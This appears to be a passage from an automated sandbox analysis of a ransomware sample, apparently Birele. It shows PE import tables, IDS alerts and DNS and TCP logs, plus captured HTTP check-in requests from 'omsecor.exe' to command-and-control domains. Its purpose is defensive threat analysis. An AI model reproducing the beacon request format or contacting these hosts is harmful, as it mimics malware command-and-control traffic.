                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                              push 00000009h
                                                                                                                                                                                                              call 00007F016532A884h
                                                                                                                                                                                                              add esp, 0Ch
                                                                                                                                                                                                              push esi
                                                                                                                                                                                                              lea eax, dword ptr [ebp+00000000h]
                                                                                                                                                                                                              Programming Language:
                                                                                                                                                                                                              • [ASM] VS2005 build 50727
                                                                                                                                                                                                              • [ C ] VS2005 build 50727
                                                                                                                                                                                                              • [LNK] VS2005 build 50727
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xf77c | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xf600 | 0x4d50 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xf6a8 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xe000 | 0x1b4 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xcc18 | 0xce00 | 7d17b3af3ad18f4a94d7ab9fe07eac18 | False | 0.5967650182038835 | data | 6.6299319364593226 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xe000 | 0x2144 | 0x2200 | 56d9054057018e96543087e97c2a076e | False | 0.4463465073529412 | data | 4.458482003449311 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x11000 | 0x1712c | 0x200 | 9159e4683d74ea27f29c3b096294f663 | False | 0.466796875 | data | 3.7016590486098133 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
WININET.dll | HttpSendRequestW, InternetConnectW, HttpOpenRequestW, InternetSetPerSiteCookieDecisionW, InternetOpenUrlW, InternetAttemptConnect, InternetOpenW, InternetReadFile, InternetClearAllPerSiteCookieDecisions, InternetCloseHandle, InternetQueryDataAvailable, InternetSetOptionW
SHLWAPI.dll | StrStrIW, PathMatchSpecW, PathCombineW, wvnsprintfW, StrStrIA, PathRemoveFileSpecW
KERNEL32.dll | TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, GetVersionExA, HeapReAlloc, RtlUnwind, WideCharToMultiByte, MultiByteToWideChar, HeapCreate, CopyFileW, CreateThread, WaitForMultipleObjects, GetTickCount, DeleteFileW, CreateProcessW, SetUnhandledExceptionFilter, ExitProcess, GetLastError, LoadLibraryW, GetProcAddress, Sleep, VirtualProtect, GetPrivateProfileIntW, ExpandEnvironmentStringsW, GetPrivateProfileStringW, FindFirstFileW, SetFilePointer, SetEndOfFile, GetVersionExW, HeapAlloc, SetWaitableTimer, SystemTimeToFileTime, CreateWaitableTimerW, FindNextFileW, HeapFree, ReadFile, GetModuleFileNameW, GetFileTime, WaitForSingleObject, GetTimeZoneInformation, CreateFileW, CloseHandle, GetFileSizeEx, VirtualFree, GetProcessHeap, GetCurrentDirectoryW, VirtualAlloc, VirtualQuery, GetSystemTime, GetFileSize, FindClose, WriteFile, GetLocalTime, GetModuleHandleW, GetCommandLineW
USER32.dll | GetWindowLongW, DispatchMessageW, GetForegroundWindow, CharLowerW, CreateWindowExW, FindWindowW, PeekMessageW, SetForegroundWindow, GetSystemMetrics, MessageBoxW, SetWindowPos, SetWindowLongW, SetParent
ADVAPI32.dll | RegOpenKeyExW, RegEnumKeyExW, RegQueryValueExW, RegSetValueExW, RegCreateKeyExW, RegCloseKey
SHELL32.dll | SHGetFolderPathW
ole32.dll | CoCreateInstance, OleInitialize, CoInitialize
OLEAUT32.dll | SysFreeString, VariantInit, SysAllocString, VariantClear
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-01T16:21:58.969242+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.6 | 50009 | 193.166.255.171 | 80 | TCP
2024-11-01T16:22:01.694283+0100 | 2016998 | ET MALWARE Connection to Fitsec Sinkhole IP (Possible Infected Host) | 1 | 192.168.2.6 | 49709 | 193.166.255.171 | 80 | TCP
2024-11-01T16:22:10.199354+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.6 | 49709 | 193.166.255.171 | 80 | TCP
2024-11-01T16:22:18.801892+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.6 | 49727 | 193.166.255.171 | 80 | TCP
2024-11-01T16:22:19.281249+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 172.202.163.200 | 443 | 192.168.2.6 | 49763 | TCP
2024-11-01T16:22:19.623901+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.6 | 49769 | 15.197.204.56 | 80 | TCP
2024-11-01T16:22:20.790141+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.6 | 49776 | 52.34.198.229 | 80 | TCP
2024-11-01T16:22:20.910667+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 52.34.198.229 | 80 | 192.168.2.6 | 49776 | TCP
2024-11-01T16:22:20.910667+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 52.34.198.229 | 80 | 192.168.2.6 | 49776 | TCP
2024-11-01T16:22:29.863054+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.6 | 49788 | 193.166.255.171 | 80 | TCP
2024-11-01T16:22:38.613596+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.6 | 49830 | 193.166.255.171 | 80 | TCP
2024-11-01T16:22:39.356294+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.6 | 49879 | 15.197.204.56 | 80 | TCP
2024-11-01T16:22:40.327774+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.6 | 49885 | 52.34.198.229 | 80 | TCP
2024-11-01T16:22:48.943456+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.6 | 49891 | 193.166.255.171 | 80 | TCP
2024-11-01T16:22:57.393256+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 172.202.163.200 | 443 | 192.168.2.6 | 49973 | TCP
2024-11-01T16:22:57.731117+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.6 | 49938 | 193.166.255.171 | 80 | TCP
2024-11-01T16:22:58.006313+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.6 | 49879 | 15.197.204.56 | 80 | TCP
2024-11-01T16:22:58.961028+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.6 | 49983 | 52.34.198.229 | 80 | TCP
2024-11-01T16:23:07.664946+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.6 | 49989 | 193.166.255.171 | 80 | TCP
2024-11-01T16:23:16.258859+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.6 | 49995 | 193.166.255.171 | 80 | TCP
2024-11-01T16:23:16.999344+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.6 | 49996 | 15.197.204.56 | 80 | TCP
2024-11-01T16:23:17.946497+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.6 | 49997 | 52.34.198.229 | 80 | TCP
2024-11-01T16:23:26.666239+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.6 | 49998 | 193.166.255.171 | 80 | TCP
2024-11-01T16:23:35.272306+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.6 | 49999 | 193.166.255.171 | 80 | TCP
2024-11-01T16:23:36.587988+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.6 | 50001 | 15.197.204.56 | 80 | TCP
2024-11-01T16:23:37.569661+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.6 | 50002 | 52.34.198.229 | 80 | TCP
2024-11-01T16:23:46.286758+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.6 | 50003 | 193.166.255.171 | 80 | TCP
2024-11-01T16:23:55.051681+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.6 | 50004 | 193.166.255.171 | 80 | TCP
2024-11-01T16:23:55.834896+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.6 | 50005 | 15.197.204.56 | 80 | TCP
2024-11-01T16:23:56.826488+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.6 | 50006 | 52.34.198.229 | 80 | TCP
2024-11-01T16:24:05.543153+0100 | 2015786 | ET MALWARE Ransom.Win32.Birele.gsg Checkin | 1 | 192.168.2.6 | 50007 | 193.166.255.171 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 1, 2024 16:22:01.694283009 CET | 49709 | 80 | 192.168.2.6 | 193.166.255.171
Nov 1, 2024 16:22:01.699266911 CET | 80 | 49709 | 193.166.255.171 | 192.168.2.6
Nov 1, 2024 16:22:01.699348927 CET | 49709 | 80 | 192.168.2.6 | 193.166.255.171
Nov 1, 2024 16:22:01.699565887 CET | 49709 | 80 | 192.168.2.6 | 193.166.255.171
Nov 1, 2024 16:22:01.704411983 CET | 80 | 49709 | 193.166.255.171 | 192.168.2.6
Nov 1, 2024 16:22:10.199237108 CET | 80 | 49709 | 193.166.255.171 | 192.168.2.6
Nov 1, 2024 16:22:10.199353933 CET | 49709 | 80 | 192.168.2.6 | 193.166.255.171
Nov 1, 2024 16:22:10.199753046 CET | 49709 | 80 | 192.168.2.6 | 193.166.255.171
Nov 1, 2024 16:22:10.204626083 CET | 80 | 49709 | 193.166.255.171 | 192.168.2.6
Nov 1, 2024 16:22:10.315309048 CET | 49727 | 80 | 192.168.2.6 | 193.166.255.171
Nov 1, 2024 16:22:10.320950031 CET | 80 | 49727 | 193.166.255.171 | 192.168.2.6
Nov 1, 2024 16:22:10.321176052 CET | 49727 | 80 | 192.168.2.6 | 193.166.255.171
Nov 1, 2024 16:22:10.321299076 CET | 49727 | 80 | 192.168.2.6 | 193.166.255.171
Nov 1, 2024 16:22:10.326160908 CET | 80 | 49727 | 193.166.255.171 | 192.168.2.6
Nov 1, 2024 16:22:18.801827908 CET | 80 | 49727 | 193.166.255.171 | 192.168.2.6
Nov 1, 2024 16:22:18.801892042 CET | 49727 | 80 | 192.168.2.6 | 193.166.255.171
Nov 1, 2024 16:22:18.802819014 CET | 49727 | 80 | 192.168.2.6 | 193.166.255.171
Nov 1, 2024 16:22:18.808285952 CET | 80 | 49727 | 193.166.255.171 | 192.168.2.6
Nov 1, 2024 16:22:18.946409941 CET | 49769 | 80 | 192.168.2.6 | 15.197.204.56
Nov 1, 2024 16:22:18.951695919 CET | 80 | 49769 | 15.197.204.56 | 192.168.2.6
Nov 1, 2024 16:22:18.951946020 CET | 49769 | 80 | 192.168.2.6 | 15.197.204.56
Nov 1, 2024 16:22:18.951946020 CET | 49769 | 80 | 192.168.2.6 | 15.197.204.56
Nov 1, 2024 16:22:18.956809044 CET | 80 | 49769 | 15.197.204.56 | 192.168.2.6
Nov 1, 2024 16:22:19.623764038 CET | 80 | 49769 | 15.197.204.56 | 192.168.2.6
Nov 1, 2024 16:22:19.623900890 CET | 49769 | 80 | 192.168.2.6 | 15.197.204.56
Nov 1, 2024 16:22:19.931107044 CET | 49776 | 80 | 192.168.2.6 | 52.34.198.229
Nov 1, 2024 16:22:19.936481953 CET | 80 | 49776 | 52.34.198.229 | 192.168.2.6
Nov 1, 2024 16:22:19.936592102 CET | 49776 | 80 | 192.168.2.6 | 52.34.198.229
Nov 1, 2024 16:22:19.936713934 CET | 49776 | 80 | 192.168.2.6 | 52.34.198.229
Nov 1, 2024 16:22:19.941548109 CET | 80 | 49776 | 52.34.198.229 | 192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:20.790091991 CET804977652.34.198.229192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:20.790141106 CET4977680192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:22:20.910666943 CET804977652.34.198.229192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:20.910723925 CET4977680192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:22:21.014872074 CET4977680192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:22:21.019705057 CET804977652.34.198.229192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:21.334338903 CET4976980192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:22:21.372437000 CET4978880192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:21.377631903 CET8049788193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:21.377721071 CET4978880192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:21.379038095 CET4978880192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:21.383939981 CET8049788193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:29.862993956 CET8049788193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:29.863054037 CET4978880192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:29.881849051 CET4978880192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:29.886674881 CET8049788193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:30.098277092 CET4983080192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:30.103286028 CET8049830193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:30.103346109 CET4983080192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:30.121573925 CET4983080192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:30.126328945 CET8049830193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:38.613482952 CET8049830193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:38.613595963 CET4983080192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:38.613682032 CET4983080192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:38.623114109 CET8049830193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:38.722513914 CET4987980192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:22:38.728853941 CET804987915.197.204.56192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:38.728940964 CET4987980192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:22:38.729095936 CET4987980192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:22:38.735745907 CET804987915.197.204.56192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:39.356230974 CET804987915.197.204.56192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:39.356293917 CET4987980192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:22:39.473020077 CET4988580192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:22:39.478363991 CET804988552.34.198.229192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:39.478429079 CET4988580192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:22:39.478585005 CET4988580192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:22:39.483625889 CET804988552.34.198.229192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:40.327507973 CET804988552.34.198.229192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:40.327774048 CET4988580192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:22:40.328604937 CET4988580192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:22:40.333887100 CET804988552.34.198.229192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:40.334078074 CET4988580192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:22:40.458249092 CET4989180192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:40.463155985 CET8049891193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:40.463218927 CET4989180192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:40.463457108 CET4989180192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:40.468452930 CET8049891193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:48.943344116 CET8049891193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:48.943455935 CET4989180192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:48.943556070 CET4989180192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:48.948431015 CET8049891193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:49.048841953 CET4993880192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:49.244505882 CET8049938193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:49.244627953 CET4993880192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:49.244889975 CET4993880192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:49.250520945 CET8049938193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:57.730891943 CET8049938193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:57.731117010 CET4993880192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:57.731396914 CET4993880192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:57.737569094 CET8049938193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:57.845740080 CET4987980192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:22:57.851000071 CET804987915.197.204.56192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:58.006225109 CET804987915.197.204.56192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:58.006313086 CET4987980192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:22:58.111692905 CET4998380192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:22:58.116714954 CET804998352.34.198.229192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:58.116844893 CET4998380192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:22:58.116975069 CET4998380192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:22:58.122034073 CET804998352.34.198.229192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:58.960884094 CET804998352.34.198.229192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:58.961028099 CET4998380192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:22:58.961680889 CET4998380192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:22:58.967068911 CET804998352.34.198.229192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:58.967174053 CET4998380192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:22:59.164309025 CET4998980192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:59.171665907 CET8049989193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:59.171740055 CET4998980192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:59.171910048 CET4998980192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:22:59.179641008 CET8049989193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:22:59.198824883 CET4987980192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:23:07.664866924 CET8049989193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:07.664946079 CET4998980192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:07.665075064 CET4998980192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:07.671092987 CET8049989193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:07.770239115 CET4999580192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:07.775208950 CET8049995193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:07.775275946 CET4999580192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:07.775427103 CET4999580192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:07.781164885 CET8049995193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:16.258625031 CET8049995193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:16.258858919 CET4999580192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:16.258964062 CET4999580192.168.2.6193.166.255.171
                                                                                                                                                                                                              Nov 1, 2024 16:23:16.263895988 CET8049995193.166.255.171192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:16.363836050 CET4999680192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:23:16.368704081 CET804999615.197.204.56192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:16.368832111 CET4999680192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:23:16.369029999 CET4999680192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:23:16.373948097 CET804999615.197.204.56192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:16.998203993 CET804999615.197.204.56192.168.2.6
                                                                                                                                                                                                              Nov 1, 2024 16:23:16.999344110 CET4999680192.168.2.615.197.204.56
                                                                                                                                                                                                              Nov 1, 2024 16:23:17.113670111 CET4999780192.168.2.652.34.198.229
                                                                                                                                                                                                              Nov 1, 2024 16:23:17.118648052 CET804999752.34.198.229192.168.2.6
UDP Packets

Timestamp                           Source Port  Dest Port  Source IP     Dest IP
Nov 1, 2024 16:22:01.499181032 CET  51438        53         192.168.2.6   1.1.1.1
Nov 1, 2024 16:22:01.686541080 CET  53           51438      1.1.1.1       192.168.2.6
Nov 1, 2024 16:22:18.910053015 CET  53668        53         192.168.2.6   1.1.1.1
Nov 1, 2024 16:22:18.944542885 CET  53           53668      1.1.1.1       192.168.2.6
Nov 1, 2024 16:22:19.737744093 CET  56857        53         192.168.2.6   1.1.1.1
Nov 1, 2024 16:22:19.930011988 CET  53           56857      1.1.1.1       192.168.2.6
DNS Queries

Timestamp                           Source IP     Dest IP   Trans ID  OP Code             Name              Type              Class        DNS over HTTPS
Nov 1, 2024 16:22:01.499181032 CET  192.168.2.6   1.1.1.1   0xe98c    Standard query (0)  lousta.net        A (IP address)    IN (0x0001)  false
Nov 1, 2024 16:22:18.910053015 CET  192.168.2.6   1.1.1.1   0xb18f    Standard query (0)  mkkuei4kdsz.com   A (IP address)    IN (0x0001)  false
Nov 1, 2024 16:22:19.737744093 CET  192.168.2.6   1.1.1.1   0xd36b    Standard query (0)  ow5dirasuek.com   A (IP address)    IN (0x0001)  false

DNS Answers

Timestamp                           Source IP  Dest IP       Trans ID  Reply Code    Name              CName  Address          Type              Class        DNS over HTTPS
Nov 1, 2024 16:22:01.686541080 CET  1.1.1.1    192.168.2.6   0xe98c    No error (0)  lousta.net               193.166.255.171  A (IP address)    IN (0x0001)  false
Nov 1, 2024 16:22:18.944542885 CET  1.1.1.1    192.168.2.6   0xb18f    No error (0)  mkkuei4kdsz.com          15.197.204.56    A (IP address)    IN (0x0001)  false
Nov 1, 2024 16:22:18.944542885 CET  1.1.1.1    192.168.2.6   0xb18f    No error (0)  mkkuei4kdsz.com          3.33.243.145     A (IP address)    IN (0x0001)  false
Nov 1, 2024 16:22:19.930011988 CET  1.1.1.1    192.168.2.6   0xd36b    No error (0)  ow5dirasuek.com          52.34.198.229    A (IP address)    IN (0x0001)  false
HTTP Request Dependency Graph

• lousta.net
• mkkuei4kdsz.com
• ow5dirasuek.com
                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              0192.168.2.649709193.166.255.171803756C:\Users\user\AppData\Roaming\omsecor.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 1, 2024 16:22:01.699565887 CET186OUTGET /404/921.html HTTP/1.1
                                                                                                                                                                                                              From: 133749481198045666
                                                                                                                                                                                                              Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A0;60:8358a99267395797f3jce;f5=be
                                                                                                                                                                                                              Host: lousta.net
                                                                                                                                                                                                              Connection: Keep-Alive


Session ID: 1 | Source IP: 192.168.2.6 | Source Port: 49727 | Destination IP: 193.166.255.171 | Destination Port: 80 | PID: 3756 | Process: C:\Users\user\AppData\Roaming\omsecor.exe

Timestamp: Nov 1, 2024 16:22:10.321299076 CET | Bytes transferred: 185 | Direction: OUT | Data:
    GET /97/341.html HTTP/1.1
    From: 133749481198045666
    Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A0;60:8358a99267395797f3jce;f5=be
    Host: lousta.net
    Connection: Keep-Alive


Session ID: 2 | Source IP: 192.168.2.6 | Source Port: 49769 | Destination IP: 15.197.204.56 | Destination Port: 80 | PID: 3756 | Process: C:\Users\user\AppData\Roaming\omsecor.exe

Timestamp: Nov 1, 2024 16:22:18.951946020 CET | Bytes transferred: 191 | Direction: OUT | Data:
    GET /922/501.html HTTP/1.1
    From: 133749481198045666
    Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A0;60:8358a99267395797f3jce;f5=be
    Host: mkkuei4kdsz.com
    Connection: Keep-Alive

Timestamp: Nov 1, 2024 16:22:19.623764038 CET | Bytes transferred: 259 | Direction: IN | Data:
    HTTP/1.1 200 OK
    Server: openresty
    Date: Fri, 01 Nov 2024 15:22:19 GMT
    Content-Type: text/html
    Content-Length: 114
    Connection: keep-alive
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


Session ID: 3 | Source IP: 192.168.2.6 | Source Port: 49776 | Destination IP: 52.34.198.229 | Destination Port: 80 | PID: 3756 | Process: C:\Users\user\AppData\Roaming\omsecor.exe

Timestamp: Nov 1, 2024 16:22:19.936713934 CET | Bytes transferred: 191 | Direction: OUT | Data:
    GET /158/381.html HTTP/1.1
    From: 133749481198045666
    Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A0;60:8358a99267395797f3jce;f5=be
    Host: ow5dirasuek.com
    Connection: Keep-Alive

Timestamp: Nov 1, 2024 16:22:20.790091991 CET | Bytes transferred: 419 | Direction: IN | Data:
    HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 01 Nov 2024 15:22:20 GMT
    Content-Type: text/html
